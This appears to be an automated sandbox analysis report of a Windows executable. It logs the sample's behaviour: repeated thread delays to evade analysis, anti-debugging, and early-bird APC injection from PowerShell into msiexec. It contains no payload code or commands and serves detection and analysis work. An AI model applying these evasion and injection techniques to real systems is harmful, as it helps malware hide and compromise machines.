Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599108	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598451	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598124	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598014	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597577	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597249	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597139	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596702	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596357	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596249	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595921	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595374	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595046	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594609	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6435			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3279			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3688	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6428	Thread sleep count: 1223 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6428	Thread sleep count: 8631 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -599655s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -599327s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -599108s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -598999s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -598671s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -598451s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -598124s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -598014s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -597796s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -597577s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -597249s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -597139s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -596921s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -596702s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -596593s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -596357s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -596249s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -596140s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -595921s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -595812s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -595593s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -595484s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -595374s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -595265s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -595156s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -595046s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -594937s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -594828s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -594718s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6456	Thread sleep time: -594609s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\000027_A-000032.exe	Code function: 0_2_00406167 FindFirstFileA,FindClose,	0_2_00406167
Source: C:\Users\user\Desktop\000027_A-000032.exe	Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405705
Source: C:\Users\user\Desktop\000027_A-000032.exe	Code function: 0_2_00402688 FindFirstFileA,	0_2_00402688

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599108	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598451	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598124	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598014	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597577	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597249	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597139	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596702	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596357	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596249	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595921	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595374	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595046	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594609	Jump to behavior

Source: powershell.exe, 00000001.00000002.2325213395.00000000050D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\^q
Source: powershell.exe, 00000001.00000002.2325213395.00000000050D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\^q
Source: ModuleAnalysisCache.1.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.1.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000006.00000002.2902791239.0000000006F6A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2902791239.0000000006FC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.2325213395.00000000050D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\^q
Source: ModuleAnalysisCache.1.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000006.00000002.2915272738.0000000022B88000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd51ed5ac3d78c<

Source: C:\Users\user\Desktop\000027_A-000032.exe	API call chain: ExitProcess graph end node			graph_0-3568
Source: C:\Users\user\Desktop\000027_A-000032.exe	API call chain: ExitProcess graph end node			graph_0-3573

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\SysWOW64\msiexec.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 6_2_00BFF270 LdrInitializeThunk,

6_2_00BFF270

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4260000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
